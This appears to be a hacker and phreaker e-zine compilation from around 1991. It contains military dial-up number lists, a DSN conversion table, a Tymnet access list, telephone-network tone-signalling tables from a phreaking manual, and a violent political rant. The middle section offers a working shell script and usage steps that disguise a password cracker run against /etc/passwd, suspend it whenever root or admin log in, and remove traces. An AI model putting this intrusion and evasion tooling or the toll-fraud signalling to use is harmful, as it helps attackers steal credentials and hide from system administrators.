           (513) 476-4489 [300/1200 bps] {B}
           (513) 476-4490 [300/1200 bps] {B}
           (513) 476-4491 [300/1200 bps] {B}
           (513) 476-4542 [300/1200 bps] {B}
           (513) 476-4543 [300/1200 bps] {B}
           (513) 476-4544 [300/1200 bps] {B}

           (614) 522-8816 (R8) [1200 bps] {B}


           (405) 248-7200 (R8) [300/1200 bps] {B}

     Oklahoma City
           (405) 733-1234 (R8) [300/1200 bps] {B}


           (717) 691-1330 (R8) [300/1200 bps] {B}

     New Cumberland
           [None known]

           (717) 770-7853 (R8) [300/1200 bps] {B}

           (215) 725-4073 (R8) [300/1200 bps] {B}

           (717) 894-0490 (R8) [300/1200] {B}

           (215) 441-3868 (R8) [300/1200 bps] {B}

  Rhode Island

           (401) 841-5380 (R8) [300/1200 bps] {B}

  South Carolina

           (803) 566-2963 (R8) [300/1200 bps] {B}

           (803) 751-3621 (R8) [300/1200 bps] {B}


           (901) 373-6091 (R8) [300/1200 bps] {B}


     Corpus Christi
           (512) 939-8113 (R8) [300/1200 bps] {B}

     Fort Bliss
           (915) 568-3229 (R8) [300/1200 bps] {B}

           (817) 288-7025 (R16) [300/1200] {B}

     San Antonio
           (512) 536-3081 (R6) [300/1200 bps] {B/V}

           (512) 925-8005 (R8) [300/1200 bps] {B}

           (512) 671-1501 (R8) [300/1200 bps] {B}
           (512) 671-1509 (R8) [300/1200 bps] {B}

           (512) 659-0323 (R4) [300/1200 bps] {B}
           (512) 659-2061 (R4) [300/1200 bps] {B}

           (512) 659-9033 (R4) [300/1200 bps] {B}
           (512) 659-2006 (R4) [300/1200 bps] {B}

           (512) 659-9022 (R4) [300/1200 bps] {B}
           (512) 652-2047 (R4) [300/1200 bps] {B}

           (512) 227-2648 (R8) [300/1200 bps] {B}


           (801) 831-3050 (R8) [300/1200 bps] {B}

           (801) 777-5514 (R8) [300/1200 bps] {B}
           (801) 777-7709 (R8) [300/1200 bps] {B}

           (801) 777-5514 (R8) [300/1200 bps] {B}
           (801) 777-7709 (R8) [300/1200 bps] {B}


           (703) 461-7900 (R8) [300/1200 bps] {B}

           [None known]

           [None known]

           (703) 979-4901 (R8) [300/1200 bps] {B}

           [None known]

           [None known]

           (703) 663-2162 (R8) [300/1200 bps] {B}

           (703) 781-0050 (R8) [300/1200 bps] {B}
           (703) 781-0100 (R8) [300/1200 bps] {B}

     Fort Lee
           (804) 734-2091 (R8) [300/1200 bps] {B}

           (804) 764-7640 (R8) [300/1200 bps] {B}

           [None known]

           (703) 506-0056 (R8) [300/1200 bps] {B}

           [None known]

     Newport News
           (804) 878-1414 (R16) [300/1200 bps] {B}

           (804) 423-0241 (R8) [300/1200 bps] {B}

           (703) 437-2892 (R5) [300/1200 bps] {B} 
           (703) 437-2925 (R3) [300/1200 bps] {B}
           (703) 437-2928 (R2) [300/1200 bps] {B}
           (703) 435-4050 (R8) [300/1200 bps] {B}


           (206) 779-1682 (R8) [300/1200 bps] {B}

           (206) 779-1082 (R8) [300/1200 bps] {B}

           (509) 247-2733 (R8) [300/1200 bps] {B}

           (206) 967-2291 (R8) [300/1200 bps] {B}

           (206) 984-6521 (R8) [300/1200 bps] {B}



           [None known]


           +49 6241-43-5316 (R8) (C) [1200 bps] {B}
           (DSN) 314-320-5316  (R8) (M) [1200 bps] {B}

           (DSN) 314-320-5641 (R8) (M) [300 bps] {V.21}
           +49 69-151-5641    (R8) (C) [300 bps] {V.21}

           [None known]

           +49 06221-57-6024  (C) [300 bps] {V.21}
           +49 06221-57-6014  (C) [300 bps] {V.21}
           (DSN) 314-370-6024 (M) [300 bps] {V.21}
           (DSN) 314-370-6014 (M) [300 bps] {V.21}
           (DSN) 314-370-6952 (M) [300 bps] {V.21}
           (DSN) 314-370-6809 (M) [300 bps] {V.21}
           (DSN) 314-370-6957 (M) [300 bps] {V.21}
           (DSN) 314-370-7201 (M) [300 bps] {V.21}
           (DSN) 314-370-7366 (M) [1200 bps] {V.22}
           (DSN) 314-370-7489 (M) [1200 bps] {V.22}
           (DSN) 314-370-7719 (M) [1200 bps] {V.22}
           (DSN) 314-370-7743 (M) [1200 bps] {V.22}

           +49 06211-57-6952  (C) [300 bps] {V.21}
           (DSN) 314-370-6952 (M) [300 bps] {V.21}
           (DSN) 314-370-6809 (M) [300 bps] {V.21}
           (DSN) 314-370-6957 (M) [300 bps] {V.21}
           (DSN) 314-370-7201 (M) [300 bps] {V.21}
           (DSN) 314-370-7366 (M) [1200 bps] {V.22}
           (DSN) 314-370-7489 (M) [1200 bps] {V.22}
           (DSN) 314-370-7719 (M) [1200 bps] {V.22}
           (DSN) 314-370-7743 (M) [1200 bps] {V.22}

           (DSN) 314-460-6354 (R4) (M) [300 bps] {V.21}
           (DSN) 314-460-7470 (R4) (M) [1200 bps] {V.22}

           (DSN) 314-475-7270 (R4) (M) [300 bps] {V.21}
           (DSN) 314-475-7274 (R4) (M) [1200 bps] {V.22}

           +011-49-6443-51-7301 (R4) (C) [300 bps] {V.21}
           (DSN) 314-450-7301   (R4) (M) [300 bps] {V.21}
           (DSN) 314-450-7305   (R4) (M) [1200 bps] {V.22}

           [None known]

           [None known]

           +49 471-80301      (R2) (C) [300 bps] {V.21}
           (DSN) 314-342-8301 (R2) (M) [300 bps] {V.21}
           (DSN) 314-342-9140 (R4) (M) [1200 bps] {V.22}

           (DSN) 314-498-3081 (R4) (M) [300 bps] {V.21}
           (DSN) 314-494-7030 (R4) (M) [300 bps] {V.21}
           (DSN) 314-498-3085 (R4) (M) [1200 bps] {V.22}
           (DSN) 314-494-7034 (R4) (M) [1200 bps] {V.22}

           [None known]

           +030 819-8084      (R4) (C) [300 bps] {V.21}
           (DSN) 314-332-8084 (R4) (M) [300 bps] {V.21}
           (DSN) 314-332-8009 (R4) (M) [1200 bps] {V.22}

           (DSN) 314-350-6500 (R4) (M) [300 bps] {V.21}

           [None known]

           (DSN) 314-440-6038 (R4) (M) [300 bps] {V.21}
           (DSN) 314-440-6076 (R4) (M) [1200 bps] {V.22}

           +011-49-06171-62754 (C) [300 bps] {V.21}
           (DSN) 314-325-2754  (M) [300 bps] {V.21}
           (DSN) 314-325-2788  (M) [300 bps] {V.21}

           [None known]

           +011-49-711-680-5722 (C) [1200 bps] {v.22}
           (DSN) 314-430-5722   (M) [1200 bps] {v.22}
           (DSN) 314-430-5723   (M) [1200 bps] {v.22}
           (DSN) 314-430-5814   (M) [1200 bps] {v.22}

           [None known]

           +49 711-680-5183        (C) [300 bps] {V.21}
           (DSN) 314-430-5053 (R4) (M) [300 bps] {V.21}
           (DSN) 314-430-5183      (M) [300 bps] {V.21} 
           (DSN) 314-430-5086 (R4) (M) [1200 bps] {V.22}

           (DSN) 314-343-6810 (R4) (M) [300 bps] {V.21}
           (DSN) 314-343-6818 (R4) (M) [1200 bps] {V.22}

           [None known]

           +49 6371-47-2752   (R12) (C) [300 bps]  {V.21}
           (DSN) 314-480-2752 (R12) (M) [300 bps]  {V.21}
           +49 6371-47-2759   (R12) (C) [1200 bps] {V.22}
           (DSN) 314-480-2759 (R12) (M) [1200 bps] {V.22}

           +49 6371-47-2754   (R4) (C) [300 bps] {V.21}
           (DSN) 314-480-27542 (R4) (M) [300 bps] {V.21}
           +49 6371-47-2775   (R12) (C) [1200 bps] {V.22}
           (DSN) 314-480-2775 (R12) (M) [1200 bps] {V.22}

           [None known]

           +49 6302-67-6477   (R4) (C) [300 bps] {V.21}
           (DSN) 314-496-6477 (R4) (M) [300 bps] {V.21}
           +49 6302-67-6481   (R4) (C) [1200 bps] {V.22}
           (DSN) 314-496-6481 (R4) (M) [1200 bps] {V.22}

           383-8112 (R4) [300 bps] {V.21}
           383-8100 (R4) [1200 bps] {V.22}

           +06134-605-040     (R4) (M) [300 bps] {V.21}
           (DSN) 314-337-6040 (R4) (M) [300 bps] {V.21}
           (DSN) 314-337-6050 (R4) (M) [1200 bps] {V.22}


           +030 1-989-5457    (C) [300 bps] {V.21}
           (DSN) 314-662-5457 (M) [300 bps] {V.21}
           (DSN) 314-662-5478 (M) [300 bps] {V.21}
           (DSN) 314-662-5586 (M) [300 bps] {V.21}
           (DSN) 314-662-5587 (M) [300 bps] {V.21}
           (DSN) 314-662-5540 (M) [1200 bps] {V.22}
           (DSN) 314-662-5532 (M) [1200 bps] {V.22}
           (DSN) 314-662-5589 (M) [1200 bps] {V.22}
           (DSN) 314-662-5539 (M) [1200 bps] {V.22}



           (DSN) 315-363-2041 (R8) (M) [300/1200 bps]
           (DSN) 315-363-2051 (R8) (M) [300/1200 bps]

           (DSN) 315-355-5071 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5072 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5161 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5162 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5265 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5266 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5451 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5452 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5696 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5697 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5701 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5702 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5803 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5804 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5935 (R2) (M) [300/1200 bps] {B}
           (DSN) 315-355-5936 (R2) (M) [300/1200 bps] {B}


           +39 81-724-4834    (C) [300 bps]  {V.21}
           +39 81-724-4541    (C) [1200 bps] {V.22}
           (DSN) 314-625-4834 (M) [300 bps]  {V.21}
           (DSN) 314-625-4304 (M) [300 bps]  {V.21}
           (DSN) 314-625-4150 (M) [1200 bps] {V.22}
           (DSN) 314-625-4425 (M) [1200 bps] {V.22}
           (DSN) 314-625-4541 (M) [1200 bps] {V.22}
           (DSN) 314-625-4543 (M) [1200 bps] {V.22}
           (DSN) 314-633-4544 (M) [1200 bps] {V.22}
           (DSN) 314-633-4620 (M) [1200 bps] {V.22}

           (DSN) 314-632-2631 (M) [300 bps] {V.21}
           (DSN) 314-632-2632 (M) [300 bps] {V.21}
           (DSN) 314-632-2661 (M) [300 bps] {V.21}
           (DSN) 314-632-2662 (M) [300 bps] {V.21}
           (DSN) 314-632-2497 (M) [1200 bps] {V.22}
           (DSN) 314-632-2594 (M) [1200 bps] {V.22}
           (DSN) 314-632-2741 (M) [1200 bps] {V.22}
           (DSN) 314-632-2891 (M) [1200 bps] {V.22}

           +39 (81) 724-5453 (R6) (C) [300/1200 bps] {B}
           +39 (81) 568-5451 (R2) (C) [300/1200 bps] {R}
           (DSN) 314-625-5451 (R2) (M) [300/1200 bps]
           (DSN) 314-625-5453 (R6) (M) [300/1200 bps}

           (DSN) 314-633-7482 (M) [300 bps] {V.21}
           (DSN) 314-633-7489 (M) [300 bps] {V.21}
           (DSN) 314-633-7470 (M) [1200 bps] {V.22}
           (DSN) 314-633-7493 (M) [1200 bps] {V.22}
           (DSN) 314-633-7494 (M) [1200 bps] {V.22}
           (DSN) 314-633-7061 (M) [1200 bps] {V.22}

           [None known]

           +39 831-422751 (R7) (C) [1200 bps] {V.22}
           (DSN) 314-622-2751 (R7) (M) [1200 bps] {V.22}

           +39 95-86-5765     (C) [300 bps] (V.21)
           +39 95-86-5766     (C) [300 bps] (V.21)
           (DSN) 314-624-5765 (M) [300 bps] (V.21)
           (DSN) 314-624-5766 (M) [300 bps] (V.21)
           (DSN) 314-624-5945 (M) [300 bps] {V.21}
           (DSN) 314-624-5946 (M) [300 bps] {V.21}
           (DSN) 314-624-5947 (M) [1200 bps] {V.22}
           (DSN) 314-624-5948 (M) [1200 bps] {V.22}
           (DSN) 314-624-5949 (M) [1200 bps] {V.22}
           (DSN) 314-624-5950 (M) [1200 bps] {V.22}

           (DSN) 314-634-7203 (R4) (M) [300 bps] {V.21}
           (DSN) 314-634-7335 (R4) (M) [1200 bps] {V.22}
           (DSN) 314-634-7004 (R8) (M) [1200 bps] {V.22}


                  (DSN) 315-641-7410 (R10)(M) [300/1200 bps] {B}

           (DSN) 315-634-4860 (R8) (M) [300/1200 bps] {B}
           (DSN) 315-634-4868 (R8) (M) [300/1200 bps] {B}

           (DSN) 315-226-4701 (R8) (M) [300/1200 bps] {B}
           (DSN) 315-226-4891 (R10)(M) [300/1200 bps] {B}

           (DSN) 315-225-2611 (R6) (M) [300/1200 bps] {B}
           (DSN) 315-225-3521 (R3) (M) [300/1200 bps] {B}
           (DSN) 315-225-3552 (R3) (M) [300/1200 bps] {B}
           (DSN) 315-225-5812 (R3) (M) [300/1200 bps] {B}
           (DSN) 315-225-5826      (M) [300/1200 bps] {B}

           (DSN) 315-233-3110 (R1) (M) [300/1200 bps] {B}
           (DSN) 315-233-3113 (R7) (M) [300/1200 bps] {B}
           (DSN) 315-233-4101 (R8) (M) [300/1200 bps] {B}


           (DSN) 314-782-5862 (R8) (M) [300/1200 bps] {B}

           (DSN) 314-784-2881 (R8) (M) [300/1200 bps]
           (DSN) 314-784-2889 (R8) (M) [300/1200 bps]

           (DSN) 314-764-5611 (R8) (M) [300/1200 bps] {B}
           (DSN) 314-764-5661 (R8) (M) [300/1200 bps] {B}

           (DSN) 314-723-1007 (R8) [300/1200 bps] {v 21}
           (DSN) 314-723-1024 (R8) [300/1200 bps] {v 21}

           [None known]


           +31 10-459-2405    (R2) (C) [300 bps] (V.21)
           (DSN) 314-362-2405 (R2) (M) [300 bps] (V.21)
           +31 10-459-2505    (R4) (C) [1200 bps] (V.22)
           (DSN) 314-362-2505 (R4) (M) [1200 bps] (V.22)


           285-6122 (R16) (M) [300/1200 bps] {B}
           [507] 85-6122 (R16) (C) [300/1200 bps] {B}


           (DSN) 315-395-5460 (R8) (M) [300/1200 bps] {B}
           (DSN) 315-395-5468 (R8) (M) [300/1200 bps] {B}


           +34 56-86-7198     (R2) (C) [300 bps] {V.21}
           (DSN) 314-727-7198 (R2) (M) [300 bps] {V.21}
           (DSN) 314-727-7198 (R3) (M) [300 bps] {V.21}
           (DSN) 314-727-2208 (R4) (M) [1200 bps] {V.22}

           +34 1-665-1875     (R3) (C) [1200 bps] {V.21}
           (DSN) 314-723-1875 (R3) (M) [1200 bps] {V.21}
           +34 1-665-1878     (R4) (C) [1200 bps] {V.22}
           (DSN) 314-723-1878 (R4) (M) [1200 bps] {V.22}
           +34 1-665-3052          (C) [1200 bps] {V.21}
           (DSN) 314-723-3052      (M) [1200 bps] {V.21}


           +90 41-337090 x2209 (C) [1200 bps] {V.21}
           +90 41-337080 x2210 (C) [1200 bps] {V.21}
           (DSN) 314-672-2245  (M) [300 bps] {V.21}
           (DSN) 314-672-2247  (M) [1200 bps] {V.21}
           (DSN) 314-672-2209  (M) [1200 bps] {V.21}
           (DSN) 314-672-2210  (M) [1200 bps] {V.21}
           (DSN) 314-672-2248  (M) [1200 bps] {V.22}
           (DSN) 314-672-2249  (M) [1200 bps] {V.22}
           (DSN) 314-672-2252  (M) [1200 bps] {V.22}
           (DSN) 314-672-2253  (M) [1200 bps] {V.22}

           +90 711-105-6165   (C) [1200 bps] {V.22}
           (DSN) 314-676-6165 (M) [1200 bps] {V.22}
           +90 711-105-6151   (C) [1200 bps] {V.22}
           (DSN) 314-676-6151 (M) [1200 bps] {V.22}

           (DSN) 314-675-3801 (R4) (M) [300/1200 bps] {v 21}


           [None known]

           (DSN) 314-236-2421 (R4) (M) [300 bps] {V.21}
           (DSN) 314-236-2441 (R4) (M) [1200 bps] {V.22}

           [None known]

           +044 638-51-3340   (R4) (C) [300 bps] {V.21}
           (DSN) 314-226-3340 (R4) (M) [300 bps] {V.21}
           (DSN) 314-226-3344 (R4) (M) [1200 bps] {V.22}

           [None known]

           +44 1-409-4754     (C) [300 bps] {V.21}
           (DSN) 314-235-4754 (M) [300 bps] {V.21}
           +44 1-409-4755     (C) [300 bps] {V.21}
           (DSN) 314-235-4755 (M) [300 bps] {V.21}

           (DSN) 314-238-3364 (R4) (M) [300 bps] {V.21}
           (DSN) 314-238-3368 (R4) (M) [1200 bps] {V.22}


              -  U.S.A Military DoD Telephone System Numbering -


                            -  The Chthonic Hvee -

    This is just a small formula list I built to compliment my previous TAC
dialups list. The conversion system is pretty obvious. So obvious in fact, one
wonders why there wasn't more ditchomoty between the PTSN and the DSN entries.
Who knows, the U.S military allways were one of the more subhuman groups on the
planet. If anyone has a more comprehensive list, I would be glad to hear from
        - Hvee

---			----			-------	 --------
314-226-xxxx	=	+44-63-851-xxxx 	England, Lakenheath
314-235-xxxx	=	+44-1-409-xxxx  	England, London
314-320-xxxx	=	+49-624-143-xxxx	Germany, Abrams
314-325-xxxx	=	+49-61-716-xxxx 	Germany, Oberursel
314-332-xxxx	=	+49-30-819-xxxx 	Germany,
314-337-xxxx	=	+49-613-460-xxxx	Germany, Wiesbaden
314-362-xxxx	=	+31-10-459-xxxx 	Netherlands, Rotterdam
314-370-xxxx	=	+49-622-157-xxxx	Germany, Campbell
314-430-xxxx	=	+49-711-680-xxxx	Germany,
314-450-xxxx	=	+49-644-351-xxxx	Germany, Hahn
314-480-xxxx	=	+49-637-147-xxxx	Germany, Ramstein
314-496-xxxx	=	+49-630-267-xxxx	Germany, Sembach
314-622-xxxx	=	+39-83-142-xxxx 	Italy, Sanvito
314-624-xxxx	=	+39-95-86-xxxx  	Italy, Sigonella
314-625-xxxx	=	+39-81-724-xxxx   	Italy,
314-662-xxxx	=	+30-1-989-xxxx    	Greece, Hellenikon
314-676-xxxx	=	+90-711-105-xxxx	Turky, Incirlik
314-723-xxxx	=	+34-1-665-xxxx  	Spain, Torrejon
314-727-xxxx	=	+34-5-686-xxxx  	Spain, Rota


                                - "Sleeper" -

                     - An automatic operator detector -


                            - The Chthonic Hvee - 

  Here is a little unix shell script I wrote a while ago. It checks to see
if a given list of users becomes active, and if they do, it stops or kills a
given list of processes. E.g

% setenv PATH ".:$PATH"
% cc -O -o cracker crack.c
% mv cracker '(find / -name core -print)                    '
% nohup '(find / -name core -print)                    ' -P /etc/passwd >core &
% nohup '(find / -name core -print)                    ' -P /tmp/pass2 >man$$ &
% cp /bin/sh incomsat
% mv sleeper.sh rmail
% cat >users
% nohup rmail 8193 8197 &
% rm rmail incomsat
% logout

Now, whenever root or admin logon or stop being idle, sleeper will stop the
givin PIDs and sleep for a few minutes. After that, it will test once again
to see if root or admin are idle, and if they are, it will startup the given

- Hvee

[ It should be in C - Editor ]

---------------------------------> sleeper.sh <--------------------------------
# Arg#1 is the file name of a list of users seperated by a "|".
# The following aruments are process ID's that are to be held while the
# users in the Arg#1 list are active.
# It is a trivial matter to have this task kill it self, along with the
# specified PIDs, when the givin user(s) become(s) active - if you want to be
# extra careful.
# The file with the list of users in it, is removed after the relevant data
# has been extracted.
# It should work on a large proportion of BSD systems and other close relatives
# such as SunOs. It all depends on your machines "w".
# For extra security, rename the above #!/bin/sh and make a link to /bin/sh,
# then delete both link and script (after running).
# Make sure you run this script with nohup....
#      - Hvee

re=/`cat $1`/
rm $1
mkdir /tmp/.tmp
cd /tmp/.tmp
ln -s `which w` -
ln -s `which sleep` '-                                                   '
ln -s `which awk` '-                                                    '
ln -s `which head` '-                                                     '
while true
 '-                                                   ' 30
 idle=`- |'-                                                    ' $re' { if(substr($0,26,6)=="      ") print "online" }'|'-                                                     ' -1`

 if [ "$idle" = "online" ]
   for pid
     if [ "$pid" != "$1" ]
         kill -STOP $pid
   while [ "$idle" = "online" ]
     '-                                                   ' 500
     idle=`- |'-                                                    ' $re' { if(substr($0,26,6)=="      ") print "online" }'|'-                                                     ' -1`
   for pid
     if [ "$pid" != "$1" ]
       kill -CONT $pid

----------------------------------> cut here <----------------------------------


%                                                                             %
&                           Phreekall Group Presents                          &
%                                                                             %
&                       The AUSTRALIAN PHREAKERS MANUAL                       &
%                                                                             %
&                               Written By Trax                               &
%                                                                             %
&                                                                             &
%                                APM Volume 2.1                               %

[ editor ]

This is first rough version of the chapters 1-3 of Trax's APM2.1
manuscript. Trax is probably going to publish it personally as was "APM Volume
#1" was. See you then Trax. And thanks again man.

[ Trax on line ]

                          Advanced Phreakers Guide.


            How to do what ever you want on the Telephone Network.

Ok in this file you will learn the in's and out's of  MFC  signalling.  We  all
know about CCITT 5.  But  what  is  MFC?  Well  first  of  all  it  stands  for
Multi-Frequency Code and is the Backward tones you  hear  when  you  play  your
Forward CCITT 5 tones. MFC tones when you know how to use  them  with  CCITT  5
tones will let you do anything a Fault Operator and Call Operator can do.  They
are however very difficult to understand. They aren't simple ST-NUMBER-KP  type
routing. So you will have to  do  some  heavy  programming  to  cope  with  the
different signalling groups. So lets get started.


Chapter 1.   Frequency Table
Chapter 2.   CCITT 5 Routing Table
Chapter 3.   MFC Signalling Table
Chapter 4.   Signalling Groups
Chapter 5.   Working it Together
Chapter 6.   Other types of Signalling
Chapter 7.   Hang Up Time


                                  Chapter 1.
                               Frequency Table

Tone Table

   |Forward  |Backward |
KEY |CCITT #5 |MFC      |KEY
----|----|----|----|----|----|     In routing  programs  i  use  the  following
1   |1380|1500|1140|1020| 1  |     defined keys.
2   |1380|1620|1140| 900| 2  |
3   |1500|1620|1020| 900| 3  |     Key |CCITT|MFC  |    See Chapter 6.
4   |1380|1740|1140| 780| 4  |     ----|-----|-----|    For other Signalling
5   |1500|1740|1020| 780| 5  |      A  | 11  | 11  |    Frequencies.
6   |1620|1740| 900| 780| 6  |      B  | 12  | 12  |
7   |1380|1860|1140| 660| 7  |      C  | KP  | 13  |
8   |1500|1860|1020| 660| 8  |      D  | KP2 | 14  |
9   |1620|1860| 900| 660| 9  |      E  | ST  | 15  |
0   |1740|1860| 780| 660| 0  |     ----|-----|-----|
11  |1380|1980|1140| 540| 11 |     This is for ease of programming only. It  is
12  |1500|1980|1020| 540| 12 |     best to have a single key switch  to  change
KP  |1620|1980| 900| 540| 13 |     between Forward and Backward frequencies.
KP2 |1740|1980| 780| 540| 14 |     So note.
ST  |1860|1980| 660| 540| 15 |     SF=Switch Forward
----|----|----|----|----|----|     SB=Switch Backward
                                  NUMBER=Telephone number
CCITT 5 Half Tones                 An example would translate from
----|----|----|----|----|----|     SF-E-1-123456-*
1380|1500|1620|1740|1860|1980|     to
----|----|----|----|----|----|     Switch Forward tones
1140|1020| 900| 780| 660| 540|     ST-(1)-NUMBER-KP
MFC Half Tones

These half tones do strange things in the middle of routing. Like alarms  going
off and numbers Re-routed STD. Note that single frequencies will be  bracketed.
[] as below.
For example.
The above is the formula for TASI line breaking.
CC=Country Code
AC=Area Code
OPD=Other Party Disconnects
[1850] The frequency in hz to get into a TASI control line.


                                  Chapter 2.
                            CCITT 5 Routing Table

This is the simplest way to route a Phone Number. Also the  only  way  alot  of
Australian Phreaker route. Depending on the Signalling Trunk  you  may  not  be
able to route a call over seas. For example STD Signalling Trunk.

11-(Not Used)
It's use in CCITT 5  Routing  is  at  present  unknown.  However  some  Telecom
Publications show it's MFC counterpart used in routing to  Interception  Centre
and used by Incoming Operators.

These could be Non-Axe to Axe Exchange Switching signals.

This routing is only allowed to Axe Exchanges from Non-Axe Exchanges.  This  is
very useful for Axe test numbers which are blocked from other Exchanges.

These could be more Non-Axe to Axe Exchange Switching signals.

KP-(Not Used)
It's use in CCITT 5 Routing is at present unknown.

The 3 digits maybe used as switches between Exchanges. For example  switch  456
Exchange to except ARF type routing or SXS type routing. The signalling between
Exchanges still being CCITT 5 and MFC but the internal switching is different.

It's use in CCITT 5 Routing is at present unknown.

Maybe Exchange switches.

It's use in CCITT 5 Routing is at present unknown.

Maybe Exchange switches.

KP2-(ST)-(No CCITT 5 or MFC signals)
This maybe used as an echo suppressor.

Another Routing method.

These maybe used to store or switch the last 4 Digits on a given number.

Maybe Exchange switches.


                                  Chapter 3.
                             MFC Signalling Table

MFC Signals have multiple function, so you'll have to know  what  is  sent  and
keep track of it to know what your signals are  going  do  next.  Now  all  MFC
Signalling start with the A Signals. Now here is a run down.

                                  A Signals
A1 Next Digit.
A2 Restart.
A3 End Of Selection. Change to B.
A4 Terminating Exchange MFC. 5 Digit Length. Change to 2A.
A5 Terminating Exchange MFC. 6 Digit Length. Change to 2A.
A6 Terminating Exchange MFC. 7 Digit Length. Change to 2A.
A7 Terminating Exchange SxS. 5 Digit Length. Change to 3A.
A8 Terminating Exchange SxS. 6 Digit Length. Change to 3A.
A9 Terminating Exchange SxS. 7 Digit Length. Change to 3A.
A0 Terminating Exchange SxS. Length Unknown. Change to 3A.

                                  2A Signals
2A1 Next Digit.
2A2 Restart.
2A3 End of Selection. Change to B.
2A4 Start Decadic. 1st Digit.
2A5 Start Decadic. 2nd Digit.
2A6 Start Decadic. 3rd Digit.
2A7 Waiting Place. Next Digit. Change to 3A.
2A8 Waiting Place. Restart. Change to 3A.
2A9 Waiting Place. Same Digit. Change to 3A.
2A0 Waiting Place. Previous Digit. Change to 3A.

                                  3A Signals
3A1 Next Digit.
3A2 Restart.
3A3 End of Selection. Change to B.
3A4 Start Decadic. 1st Digit.
3A5 Start Decadic. 2nd Digit.
3A6 Start Decadic. 3rd Digit.
3A7 Start Decadic. 4th Digit.
3A8 Start Decadic. 5th Digit.
3A9 Send A-Party Category. Change to C.
3A0 Send Previous Digit.

                                  B Signals
B1 Idle Sub.
B2 Busy Sub.
B3 No Throwout.
B4 Congestion.
B5 Idle - Non Metering.
B6 B-Party Control. No time-out.
B7 B-Party Control. Non chargeable.
B8 Re-route to interception.
B9 Send A-Party Category. Change to C.
B0 Send Previous Digit.

                                  C Signals
C1 Next Digit.
C2 Restart.
C3 End of Selection. Change to B.
C4 Start Decadic. 1st Digit. (Ult. Congestion)
C5 Start Decadic. 2nd Digit. (Ult. Zone of Origin)
C6 Start Decadic. 3rd Digit.
C7 Start Decadic. 4th Digit.
C8 Start Decadic. 5th Digit.
C9 Send A-Party Number.
C0 Send Previous Digit.


   ::                       TYMNET                        ::
   ::                                                     ::
   ::							  ::
   ::                        By                           ::
   ::                                                     ::
   ::                 The Chthonic Hvee                   ::

The PSS was probably the childhood of every hacker who has been around
for more than 3 or 4 years. Remember Altger/altos? Those were the days.
Remember when there were NO hacking laws? When Feds busted you for possesing
drugs? When the underground finnaly brought to public awareness the truth about
the Maralinga nuclear tests successfully (10 years before that we tried - and
died). When almost every exchange was non-CLI?. Yeah - take me back man, I
don't belong in this brave new world of demented super-visor capitalism.

And we thought the late 80's was bad...

 The revolution - not now. Not now. No for the powermoungers have changed, now
they are very covert - and the people have become soft, living their life in a
unreality and refusing to open their eyes' to the truth. But give me a gun, my
girl, an escape and I shall kill this sick monster child the 1980's has
spawned. Believe me, I know just where to shoot. Trashcan man - let there be


BT Tymnet has local dial-up access in over 800 cities in the United States
and its territories, and over 130 International access locations using a
variety of industry standard modem technologies.

      BELL 212A = 300/1200 BPS BELL 212/113 COMPATIBLE
      VADIC-3467 = 300/1200 BPS BELL 212/113 AND 1200 BPS
                   VADIC 3400 COMPATIBLE
      2400 BPS   = 2400 BPS CCITT V.22bis COMPATIBLE


@ConnNet = Southern New England Telephone, providing access to
TYMNET through their statewide packet switching network.  To
logon, dial the local ConnNet access number.  The ConnNet network
responds with "WELCOME TO CONNNET PLEASE LOGON: *".  At the
asterisk enter .T (capital letters) and press carriage return.
Tymnet responds and regular logon procedures follow.

STAT MUX = ALASCOM, the Alaska state telecommunications authority,
providing access to TYMNET through their packet switching network.
Some locations are served by Statistical Multiplexers.  To access
TYMNET from Alascom, a user needs to have a validated user name on
both networks.  To have your Tymnet user name validated on the
Alascom network, please contact Linda Phillips at 800-544-2233.
With a validated user name, execute the following procedures to
logon:  1)After the STAT MUX modem answers it will output garbage
characters.  Once these have been observed, enter two carriage
returns.  2)Type your terminal identifier character then enter a
carriage return.  The rest of the logon is standard Tymnet.


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE 1

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
03324 # ANNISTON             ALABAMA        LOW  205/236-3342  300-2400/MNP
02246   BIRMINGHAM           ALABAMA        HIGH 205/942-4141
04415 # BIRMINGHAM           ALABAMA        HIGH 205/942-7898  2400/MNP
03453   BIRMINGHAM           ALABAMA        HIGH 205/942-0297  9600/MNP
07723 # DOTHAN               ALABAMA        LOW  205/794-7954  300-2400/MNP
05221 # FLORENCE             ALABAMA        LOW  205/760-0030  300-2400/MNP
10305 # GADSDEN              ALABAMA        LOW  205/543-3550  300-2400/MNP
03122   HUNTSVILLE           ALABAMA        MED  205/882-3003
11006 # HUNTSVILLE           ALABAMA        MED  205/880-8912  2400/MNP
03546   MOBILE               ALABAMA        MED  205/343-8414
11241 # MOBILE               ALABAMA        MED  205/460-2515  2400/MNP
03545 # MONTGOMERY           ALABAMA        LOW  205/265-4570  300-2400/MNP
11321 # NORTHPORT            ALABAMA        LOW  205/758-1116  300-2400/MNP
05431 # OPELIKA              ALABAMA        LOW  205/742-9040  300-2400/MNP
11321 # TUSCALOOSA/NORTHPORT ALABAMA        LOW  205/758-1116  300-2400/MNP

00000   ANCHORAGE            ALASKA         INTL 907/258-7222
00000 # ANCHORAGE            ALASKA         INTL 907/258-6607  2400/MNP
00000   BARROW               ALASKA         INTL 907/852-2425  STAT MUX
00000   BETHEL               ALASKA         INTL 907/543-2411  STAT MUX
00000   COLD BAY             ALASKA         INTL 907/532-2371
00000   CORDOVA              ALASKA         INTL 907/424-3744
00000   DEAD HORSE           ALASKA         INTL 907/659-2777
00000   DELTA JUNCTION       ALASKA         INTL 907/895-5070
00000   DILLINGHAM           ALASKA         INTL 907/842-2688  STAT MUX
